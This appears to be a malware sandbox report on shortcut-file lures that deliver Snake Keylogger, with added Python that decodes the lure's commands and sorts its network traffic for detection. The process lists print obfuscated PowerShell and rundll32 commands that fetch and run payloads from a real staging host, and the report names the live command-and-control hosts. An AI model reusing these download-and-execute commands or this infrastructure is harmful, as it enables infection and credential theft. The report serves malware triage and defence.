N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3852 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 3852 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 1676 wrote to memory of 4184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 4184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4184 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4184 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 3168 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 3168 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3168 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4464 wrote to memory of 220 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 4464 wrote to memory of 220 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 3168 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3168 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2356 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 2356 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 2356 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2356 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2356 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2356 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3168 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 3168 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 5060 wrote to memory of 4128 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe
PID 5060 wrote to memory of 4128 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe
PID 5060 wrote to memory of 4128 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
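The process list that follows shows the first stage only as a -eC (-EncodedCommand) argument: base64 over the UTF-16LE bytes of the script, with letter case randomised per character and Unicode right double quotation marks (U+201D) used as string delimiters, which PowerShell's tokenizer accepts like ASCII quotes but which defeat a naive search for "http. The Python below is an added example, not code from the sandbox or from this report; it decodes the -ec value from this detonation and the one from the Photo01.jpg.lnk detonation further down, folds both to one canonical form, and pulls out the download URL and the drop path. Both encoded values are copied from this page; nothing else about the sample is assumed.

```python
import base64
import re

# Both -ec arguments are copied verbatim from this report's process lists:
# the first from the Image012.png.lnk detonation, the second from the
# Photo01.jpg.lnk detonation.
EC_IMAGE012 = (
    "IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQA"
    "IAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkA"
    "YgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIA"
    "YQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUA"
    "bgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEA"
    "dAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAA"
    "CQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYA"
    "cgAuAGIAYQB0AB0g"
)
EC_PHOTO01 = (
    "IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMA"
    "dAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYA"
    "eQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4A"
    "YgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUA"
    "TgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEA"
    "dAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkA"
    "HSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIA"
    "LgBiAGEAdAAdIA=="
)

# PowerShell treats these Unicode quotes exactly like ASCII ones, so a decoder
# has to fold them before any string matching is attempted.
QUOTE_FOLD = str.maketrans({
    "\u201c": '"', "\u201d": '"', "\u201e": '"',
    "\u2018": "'", "\u2019": "'", "\u201a": "'", "\u201b": "'",
})

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
ENV_PATH_RE = re.compile(r"""\$env:[a-z]+\\[^\s"'<>;]+""")


def decode_encoded_command(ec: str) -> str:
    """Decode a -EncodedCommand value: base64 over the script's UTF-16LE bytes.

    powershell.exe tolerates missing '=' padding, so restore it before decoding.
    """
    ec = "".join(ec.split())
    ec += "=" * (-len(ec) % 4)
    return base64.b64decode(ec, validate=True).decode("utf-16-le")


def normalize(script: str) -> str:
    """Canonical form: ASCII quotes, single spaces, lower case.

    Commands that differ only in random casing, tab/space padding and quote
    style collapse to the same string here.
    """
    return " ".join(script.translate(QUOTE_FOLD).split()).lower()


def extract_iocs(script: str) -> dict:
    """Pull the download URL(s) and the $env:-relative drop path(s) out of a script."""
    canon = normalize(script)
    return {
        "urls": sorted(set(URL_RE.findall(canon))),
        "drop_paths": sorted(set(ENV_PATH_RE.findall(canon))),
    }


if __name__ == "__main__":
    for label, ec in (("Image012.png.lnk", EC_IMAGE012), ("Photo01.jpg.lnk", EC_PHOTO01)):
        script = decode_encoded_command(ec)
        print(f"[{label}] raw:   {script!r}")
        print(f"[{label}] canon: {normalize(script)}")
        print(f"[{label}] iocs:  {extract_iocs(script)}")
```

Both encoded commands reduce to the same line, invoke-webrequest -uri "http://vybsnf3.sa.com/med.bat" -outfile "$env:temp\jrbbsfr.bat" ; invoke-item "$env:temp\jrbbsfr.bat", which is the jrbbsfr.bat that cmd.exe runs in the next process entry. Match on the canonical form rather than on the raw command line; a re-randomised build of the same lure would otherwise slip past an exact-string rule.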

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" Cmd /C pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "

C:\Windows\system32\DeviceCredentialDeployment.exe

DEVIcECRedentIALdEPLOymEnt

C:\Windows\system32\rundll32.exe

RUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 8

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

C:\Windows\system32\rundll32.exe

rundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe

C:\Windows\system32\DeviceCredentialDeployment.exe

dEvicEcredeNTiAldEPlOYMeNT

C:\Windows\system32\timeout.exe

timEout /T 7 /nObREAK

C:\Windows\system32\taskkill.exe

TAskkilL.Exe /F /Im rUNdlL32.exE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B

C:\Windows\system32\conhost.exe

CoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 vybsnf3.sa.com udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 190.120.93.172.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 varders.kozow.com udp
FR 51.38.247.67:8081 varders.kozow.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 aborters.duckdns.org udp
NL 91.92.255.235:8081 aborters.duckdns.org tcp
US 8.8.8.8:53 235.255.92.91.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
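The Network table above mixes three things a triage analyst wants kept apart: the sandbox's own reverse lookups (every .in-addr.arpa row, which is resolver noise rather than sample behaviour), the external-IP and geolocation lookups that the "Looks up external IP address via web service" signature fired on, and the two dynamic-DNS hosts contacted on port 8081 immediately after those lookups, which are the command-and-control candidates. vybsnf3.sa.com on port 80 is the staging host the process list already identifies as the source of med.bat and jertrs.exe. The Python below is an added example, not part of the report: it parses the 25 rows above and buckets them that way. The lists of external-IP services and dynamic-DNS zones are assumptions of the example, seeded from the hosts on this page plus a few well-known ones.

```python
# Network table of this detonation, copied verbatim: country, destination
# ip:port, domain, protocol.
NETWORK_ROWS = """\
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 vybsnf3.sa.com udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 190.120.93.172.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 varders.kozow.com udp
FR 51.38.247.67:8081 varders.kozow.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 aborters.duckdns.org udp
NL 91.92.255.235:8081 aborters.duckdns.org tcp
US 8.8.8.8:53 235.255.92.91.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
"""

# Assumed lists: the two services seen on this page plus a few common ones.
EXTERNAL_IP_SERVICES = {
    "checkip.dyndns.org", "reallyfreegeoip.org", "api.ipify.org",
    "icanhazip.com", "ifconfig.me", "ip-api.com",
}
# Free dynamic-DNS zones (DuckDNS, Dynu's kozow.com, No-IP) used by commodity stealers.
DDNS_ZONES = (".duckdns.org", ".kozow.com", ".no-ip.org", ".no-ip.com", ".ddns.net", ".hopto.org")
STANDARD_WEB_PORTS = {80, 443}


def parse_rows(text: str) -> list:
    """Split the sandbox table into dicts; one row per line, four columns."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        country, dst, domain, proto = line.split()
        ip, port = dst.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def summarize(text: str) -> dict:
    """Bucket connections into lookup noise, IP-recon, DDNS C2 candidates, and the rest."""
    out = {"ptr_dropped": 0, "external_ip_lookup": set(),
           "ddns_nonstandard_port": set(), "other_tcp": set()}
    resolved, connected = set(), set()
    for r in parse_rows(text):
        if r["domain"].endswith(".in-addr.arpa"):   # sandbox reverse lookups
            out["ptr_dropped"] += 1
            continue
        if r["proto"] == "udp" and r["port"] == 53:  # forward resolution only
            resolved.add(r["domain"])
            continue
        if r["proto"] != "tcp":
            continue
        connected.add(r["domain"])
        entry = f'{r["domain"]} {r["ip"]}:{r["port"]}'
        if r["domain"] in EXTERNAL_IP_SERVICES:
            out["external_ip_lookup"].add(entry)
        elif r["domain"].endswith(DDNS_ZONES) and r["port"] not in STANDARD_WEB_PORTS:
            out["ddns_nonstandard_port"].add(entry)
        else:
            out["other_tcp"].add(entry)
    out["dns_only"] = resolved - connected  # names resolved but never contacted
    return {k: (sorted(v) if isinstance(v, set) else v) for k, v in out.items()}


if __name__ == "__main__":
    for key, value in summarize(NETWORK_ROWS).items():
        print(f"{key}: {value}")
```

The external-IP lookups are not command-and-control on their own, but a process that performs them and then opens a TCP session to a dynamic-DNS name on a non-web port, as regasm.exe does here, is a much tighter signal than either event alone; block the two 8081 destinations at the egress and alert on the sequence.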

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ns1iedlr.ifu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4184-9-0x000001DF30C60000-0x000001DF30C82000-memory.dmp

memory/4184-10-0x00007FFA58680000-0x00007FFA59141000-memory.dmp

memory/4184-11-0x000001DF30CE0000-0x000001DF30CF0000-memory.dmp

memory/4184-12-0x000001DF30CE0000-0x000001DF30CF0000-memory.dmp

memory/4184-18-0x00007FFA58680000-0x00007FFA59141000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat

MD5 885e4bf9c36d1964f751bca33e898503
SHA1 4055100dda8ee3845cfda6735900c556d8c19ca1
SHA256 5efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA512 5da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3

C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

MD5 39aceb0c8a015a4e8f66498e03ff16db
SHA1 4707695dece3a70bfbe55868d059a22e4325eaf0
SHA256 7eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA512 0cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7V1N9ZS9\jertrs[1].exe

MD5 b07832ec5f73ae5f2888ebab2aa5283a
SHA1 cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256 dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA512 7a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

MD5 ec5031625d0458f61b9ce0b9115e9b24
SHA1 bf4e8ad7bfa02fb651b5afb75bcfe2f0e75978b9
SHA256 255275e570fe7745e01411f4793511b19f5a8562ea85f92160793592136520d3
SHA512 7323beb6ddf25c8ead15f565895cc86f4514ef2f3cf25df2672b1df3c5a6fc22987a258a7ded375d942ebab1afc079c1d145db0b60767c98667d04e1840d5fc3

memory/4128-34-0x0000000002340000-0x0000000002341000-memory.dmp

memory/4128-32-0x0000000076F52000-0x0000000076F53000-memory.dmp

memory/4128-37-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-39-0x0000000074BA0000-0x0000000074CFD000-memory.dmp

memory/4128-40-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-43-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-42-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-44-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-45-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-46-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-47-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-53-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-57-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-55-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-59-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-61-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-62-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-64-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-67-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-68-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-69-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-70-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-71-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-72-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-74-0x0000000002550000-0x0000000002558000-memory.dmp

memory/4128-75-0x0000000000690000-0x0000000000790000-memory.dmp

memory/964-76-0x0000000000400000-0x000000000042B000-memory.dmp

memory/964-81-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

memory/964-80-0x0000000076F52000-0x0000000076F53000-memory.dmp

memory/4128-82-0x0000000002550000-0x0000000002558000-memory.dmp

memory/4128-79-0x0000000074BA0000-0x0000000074CFD000-memory.dmp

memory/4128-78-0x0000000000400000-0x000000000054B000-memory.dmp

memory/964-83-0x0000000000400000-0x0000000000426000-memory.dmp

memory/964-85-0x0000000005B70000-0x0000000006114000-memory.dmp

memory/964-86-0x00000000054C0000-0x000000000555C000-memory.dmp

memory/964-84-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/964-87-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/964-88-0x0000000006830000-0x0000000006880000-memory.dmp

memory/964-89-0x0000000006A50000-0x0000000006C12000-memory.dmp

memory/964-90-0x0000000006920000-0x00000000069B2000-memory.dmp

memory/964-91-0x00000000068B0000-0x00000000068BA000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win7-20231129-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" CmD /C powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==

Network

N/A

Files

memory/2688-40-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2688-41-0x00000000028A0000-0x00000000028A8000-memory.dmp

memory/2688-42-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/2688-43-0x0000000002D20000-0x0000000002DA0000-memory.dmp

memory/2688-44-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/2688-45-0x0000000002D20000-0x0000000002DA0000-memory.dmp

memory/2688-48-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/2688-47-0x0000000002D20000-0x0000000002DA0000-memory.dmp

memory/2688-46-0x0000000002D20000-0x0000000002DA0000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

157s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk

Signatures

Snake Keylogger

stealer keylogger snakekeylogger

Snake Keylogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\VH4I14XV\jertrs[1].exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
